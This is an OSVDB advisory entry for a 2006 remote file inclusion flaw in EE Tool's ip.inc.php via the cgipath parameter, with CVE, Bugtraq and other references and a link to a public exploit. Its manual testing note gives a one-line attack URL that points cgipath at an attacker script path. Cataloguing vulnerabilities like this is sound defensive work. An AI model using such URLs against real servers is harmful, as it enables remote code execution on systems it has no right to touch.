EE Tool ip.inc.php cgipath Variable Remote File Inclusion

2006-10-28T01:47:28
ID OSVDB:33843
Type osvdb
Reporter OSVDB
Modified 2006-10-28T01:47:28

Description

Manual Testing Notes

http://[target]/ip.inc.php?type=1&cgipath=evilscripts

References:

ISS X-Force ID: 29884 Generic Exploit URL: http://milw0rm.com/exploits/2667 FrSIRT Advisory: ADV-2006-4231 CVE-2006-5623 Bugtraq ID: 20780